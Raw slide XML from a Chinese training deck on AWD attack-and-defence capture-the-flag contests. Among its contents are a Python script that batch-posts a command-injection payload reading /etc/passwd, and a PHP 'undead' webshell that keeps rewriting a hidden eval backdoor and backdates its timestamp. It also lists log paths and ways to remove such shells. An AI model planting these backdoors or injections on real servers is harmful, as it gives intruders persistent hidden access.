              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t> 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一眼就看出来了好伐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2000" spc="409" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-190" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>AWD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t> 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中优先考虑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ts val="3165"/>
              </a:lnSpc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种不死马、反</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>弹</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-145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2000" spc="-65" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" spc="-65" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>等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留后门方式维持权限，以便后</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>续</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="5" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>刷</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-135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2000" spc="-55" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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再考虑提升权限</a:t>
            </a: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975" y="56959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19211" cy="682151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394" y="209550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6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11745468" y="6391656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11745468" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6391656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86129" y="65328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攻 击 流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程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975" y="1186815"/>
            <a:ext cx="10147300" cy="45491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批量</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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getshell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2345"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="780"/>
              </a:spcBef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根据加固阶段找出的漏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洞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编写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对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应的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-120" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>exp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批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量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测试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漏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洞</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-70" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-135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55" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-55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endParaRPr sz="2000" spc="-55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ts val="2345"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="780"/>
              </a:spcBef>
            </a:pP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428750">
              <a:lnSpc>
                <a:spcPts val="1205"/>
              </a:lnSpc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#!/usr/local/env</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="10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python3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42875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#coding:utf-8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428750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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import</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="10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requests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 marR="4302125" indent="-132715">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1050" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>def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getFlag(ip, port, webshells,endPart): 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url = </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>"http://"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050" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>":"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+ port + endPart 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print(url)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>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1050" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>headers =</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="10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{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428750" marR="5080" indent="266700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/sign  ed-exchange;v=b3",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695450" marR="4412615">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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"Accept-Encoding": "gzip, deflate",  "User-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428750" marR="24765">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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Agent": "Mozilla/5.0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(Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" spc="5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>NT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10.0; Win64; x64)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AppleWebKit/537.36 (KHTML, like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Gecko) Chrome/76.0.3809.10  0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Safari/537.36"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>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1050" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>}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>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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payload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0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webshells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561465" marR="3179445">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1050" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>r =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requests.post(url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url,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headers = headers, data =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payload)  print(r.content)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 marR="5024755" indent="-132715">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="2129790" algn="l"/>
              </a:tabLst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1050" spc="-15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050" u="sng" spc="-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10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>":  </a:t>
            </a:r>
            <a:endParaRPr sz="1050" spc="-10" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1561465" marR="5024755" indent="-132715">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="2129790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" spc="-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0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"192.168.1.4"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>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1050" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>port =</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="10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"8585"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Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>endPart =</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="10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"/calc.php"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61465" marR="2775585">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1050" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>webshells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{"target":"1`cat /etc/passwd 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1050" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>/tmp/g`", "cny_num":"1"}  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
              </a:rPr>
              <a:t>getFlag(ip, port, webshells,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 endPart)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6197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2979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日 志 分</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="26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析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069" y="1529283"/>
            <a:ext cx="4631055" cy="352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>
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-140" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-35" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>/var/log/apache2/</a:t>
            </a:r>
            <a:endParaRPr sz="28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tabLst>
                <a:tab pos="989965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-155" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Nginx	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>/usr/nginx/logs/</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial" panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPts val="8070"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1040"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="621030" algn="l"/>
                <a:tab pos="1149350" algn="l"/>
                <a:tab pos="1219200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-190" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>Tomcat		</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-20" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>/usr/local/tomcat/logs/  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>tail	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-50" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>–f	</a:t>
            </a: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日志文件名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530" y="568960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6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94" y="36285"/>
            <a:ext cx="12155605" cy="67854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0990" y="233934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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11745468" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11745468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3815" y="516255"/>
            <a:ext cx="8458835" cy="448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干 掉 不 死</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="32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马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900" spc="-1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C   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 u </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="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r </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5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    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="9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i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n 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t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="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r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 d u </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-7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c  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t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="3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i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 n</a:t>
            </a:r>
            <a:endParaRPr sz="9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</a:pPr>
            <a:endParaRPr sz="9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</a:pPr>
            <a:endParaRPr sz="9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</a:pPr>
            <a:endParaRPr sz="9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 panose="020B0604020202090204"/>
              <a:cs typeface="Arial" panose="020B0604020202090204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="616585" indent="-457835">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="616585" algn="l"/>
                <a:tab pos="617220" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>强</a:t>
            </a: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行</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-140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2800" spc="-20" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>kill</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-145" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>掉进程后重启服务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604020202090204"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="345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616585" indent="-457835">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="616585" algn="l"/>
                <a:tab pos="617220" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>建立一个和不死马相同名字的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>者目录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90204"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="35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616585" indent="-457835">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="616585" algn="l"/>
                <a:tab pos="617220" algn="l"/>
              </a:tabLst>
            </a:pP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写脚本不断删除文件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90204"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="35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616585" indent="-457835">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="616585" algn="l"/>
                <a:tab pos="617220" algn="l"/>
              </a:tabLst>
            </a:pP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不断写入一个和不死马同名的文件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 </a:t>
            </a:r>
            <a:r>
              <a:rPr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65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959" y="641222"/>
            <a:ext cx="20364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什 么 是 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1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b="1" spc="-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W </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-18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sz="2000" b="1" spc="-1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？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383" y="1420748"/>
            <a:ext cx="9645650" cy="168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AWD（attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-95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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="5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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-75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defence）</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0"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攻防兼备模式</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="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AWD模式是一个非常有意思的模式，你需要在一场比赛里扮演攻击方和防守方，攻击成功得分， 失守也会扣除相应的分数。在比赛中，评分的关键点是flag，通过漏洞攻击得到flag，可以获取分数；反之，失守flag会被扣除相应的分数。从而模拟现实的网络攻击防御，以此提高选手的网络攻防能力。</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="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0383" y="5262117"/>
            <a:ext cx="9398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特点：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>
              <a:lnSpc>
                <a:spcPts val="2120"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef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选手同时具备攻击方和防守方两种角色，对选手的攻击能力、防御能力、团队协作能力及实时 的应变能力都是极大的考验，更偏向实战能力的较量。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8521" y="3206876"/>
            <a:ext cx="2232660" cy="2232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233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课程目录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37958" y="2983229"/>
            <a:ext cx="249047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一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60" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>AWD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的概念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85115" marR="36830">
              <a:lnSpc>
                <a:spcPct val="190000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>二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A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="114" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="80" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>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攻防之加固 三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、A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="114" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="80" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>D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攻防之攻击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85115" indent="-273050">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1945"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F44F53"/>
              </a:buClr>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="285750" algn="l"/>
              </a:tabLst>
            </a:pP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四</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5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、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-4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A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="140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WD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>攻防之脚本</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="Heiti SC" panose="02000000000000000000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285"/>
            <a:ext cx="12191999" cy="67854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790" y="233934"/>
            <a:ext cx="11744325" cy="6391910"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11744325" h="6391909">
                <a:moveTo>
                  <a:pt x="0" y="6391655"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11743944" y="6391655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743944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695" y="693801"/>
            <a:ext cx="37293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四、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-305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AWD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻防之</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>脚</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>本</a:t>
            </a:r>
            <a:endParaRPr sz="3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997" y="1828546"/>
            <a:ext cx="28746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不死马脚本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 panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="46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强悍</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="75" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>Webshell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 panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="46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spc="100" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>Ba</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="65" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="85" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>h</a:t>
            </a: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常用逻辑语法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 panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="299085" indent="-287020">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:buChar char="➢"/>
              <a:tabLst>
                <a:tab pos="299720" algn="l"/>
              </a:tabLst>
            </a:pP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必备</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="120" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
                <a:cs typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Heiti SC" panose="02000000000000000000" charset="-122"/>
              <a:cs typeface="Heiti SC" panose="02000000000000000000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3815" y="653415"/>
            <a:ext cx="249047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不 死 马 脚</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="32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本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069" y="1164691"/>
            <a:ext cx="6332855" cy="3254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46650">
              <a:lnSpc>
                <a:spcPct val="146000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="9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&lt;?php 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ignore_user_abort(true);  set_time_limit(0);  unlink(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100" u="sng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$file =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'./.ma.php';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930"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15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$code =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'&lt;?php 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if(md5($_POST["pass"])=="</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-25" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>c4ca4238a0b923820dcc509a6f75849b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"){@eval($_POST[a]);}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?&gt;';  while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(1){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file_put_contents($file,$code);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system('touch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-m -d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"2017-11-17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15:20:54"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.ma.php');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usleep(5000);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?&gt;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0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>ignore_user_abort(true);</a:t>
            </a:r>
            <a:endParaRPr sz="16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415" y="3725545"/>
            <a:ext cx="1002665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函数设置与客户机断开是否会终止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脚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本的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执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行。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这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里设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置为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true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则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忽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略与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用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户的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断开，即使与客户机断开脚本仍会</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600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执</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10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行。</a:t>
            </a:r>
            <a:endParaRPr sz="1600" spc="-10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815" y="4352925"/>
            <a:ext cx="10255885" cy="142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Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>set_time_limit()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函数设置脚本最大执行时间。这里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设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置</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 CN" panose="020B0300000000000000" charset="-122"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-45" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202090204"/>
                <a:cs typeface="Arial" panose="020B0604020202090204"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
